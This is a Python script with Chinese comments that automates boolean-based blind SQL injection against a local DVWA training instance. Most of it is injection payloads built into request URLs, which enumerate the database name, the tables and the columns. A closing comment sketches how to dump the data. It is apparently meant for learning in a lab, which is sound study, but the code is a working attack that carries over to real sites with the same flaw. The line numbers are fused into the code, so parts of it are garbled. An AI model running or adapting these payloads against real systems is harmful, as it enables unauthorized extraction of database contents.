仅供学习代码参考
1#python dvwa布尔盲注自动化脚本
2 importrequests3 importstring4 importtime5 INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="
6 token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #登录身份识别
7 COLUMN_NUM=11
8 COLUMN_LEN=15
9 dbLen=010 dbname=''
11 table_num=012 table=[]13 table_name='' #暂存用
14 column=[]15 column_name=''#暂存用
16 rightLen=017
18 time_start=time.time()19 url=INIT_URL+"1&Submit=Submit#"
20 rightLen=len(requests.get(url=url,cookies=token).text)21 print("正常返回文本长度:"+str(rightLen))22 #1.猜解数据库名长度 poc:" 1'and (select length(database()))="+str(dbLen)#"
23 whileTrue:24 dbLen +=1
25 dbUrl=INIT_URL+"1'and (select length(database()))="+str(dbLen)+"%23&Submit=Submit#"
26 print(dbUrl)27 if len(requests.get(url=dbUrl,cookies=token).text)==rightLen:28 print("数据库长度:"+str(dbLen))29 break
30 #2.猜解数据库名字 poc:" 1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1#"
31 for i in range(1,dbLen+1):32 for j instring.ascii_lowercase:33 dbnameUrl=INIT_URL+"1'and(select mid(database(),"+str(i)+",1)='"+j+"')=1%23&Submit=Submit#"
34 print(dbnameUrl)35 if len(requests.get(url=dbnameUrl,cookies=token).text)==rightLen:36 dbname+=j37 break
38
39 print("数据库名字:"+dbname)40
41 #3.猜解数据库表数量 poc:" 1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)#"
42
43 for i in range(100):44 dbUrl=INIT_URL+"1'and (select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+"%23&Submit=Submit#"
45 print(dbUrl)46 if len(requests.get(dbUrl,cookies=token).text)==rightLen:47 print("表数量"+str(i))48 table_num=i49 break
50
51 #4.猜解表名 poc:" 1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103#
52
53 for i inrange(table_num):54 for k inrange(COLUMN_LEN):55 for j in range(48,123):56 dbUrl=INIT_URL+"1'and (select ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
57 print(dbUrl)58 if len(requests.get(dbUrl,cookies=token).text)==rightLen:59 table_name+=chr(j)60 print(table_name)61 break
62 table.append(table_name)63 table_name=''
64 print("表名:"+str(table))65
66
67
68 #5.猜解列名 poc :" 1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i
69
70
71 for m inrange(table_num):72 for i inrange(COLUMN_NUM):73 for k inrange(COLUMN_LEN):74 for j in range(48,123):75 dbUrl=INIT_URL+"1'and (select ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit"+str(i)+",1),"+str(k)+",1)))="+str(j)+"%23&Submit=Submit#"
76 print(dbUrl)77 if len(requests.get(dbUrl,cookies=token).text)==rightLen:78 column_name+=chr(j)79 print(column_name)80 break
81 column_name+='/'
82 column.append(column_name)83 column_name=''
84 print("列名:"+str(column))85
86 time_end=time.time()87 print('用时:',time_end-time_start,'s')88 print("正常返回文本长度:"+str(rightLen))89 print("数据库长度:"+str(dbLen))90 print("数据库名字:"+dbname)91 print("表数量"+str(i))92 print("表名:"+str(table))93 print("列名:"+str(column))94 #6.拖库 poc: 1'and (select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i
95 #具体列具体猜解,全部猜解时间太高